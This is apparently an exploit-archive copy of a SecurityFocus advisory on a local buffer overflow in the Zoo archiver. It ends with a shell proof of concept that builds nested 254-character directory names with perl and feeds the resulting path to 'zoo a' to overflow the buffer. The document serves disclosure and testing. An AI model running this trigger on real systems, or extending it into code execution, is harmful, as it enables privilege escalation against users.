13 lines
No EOL
640 B
Text
13 lines
No EOL
640 B
Text
source: http://www.securityfocus.com/bid/17126/info
|
|
|
|
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
|
|
|
|
mkdir `perl -e 'print "A"x254'`
|
|
cd `perl -e 'print "A"x254'`
|
|
mkdir `perl -e 'print "A"x254'`
|
|
cd `perl -e 'print "A"x254'`
|
|
touch feh
|
|
cd ../..
|
|
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'` |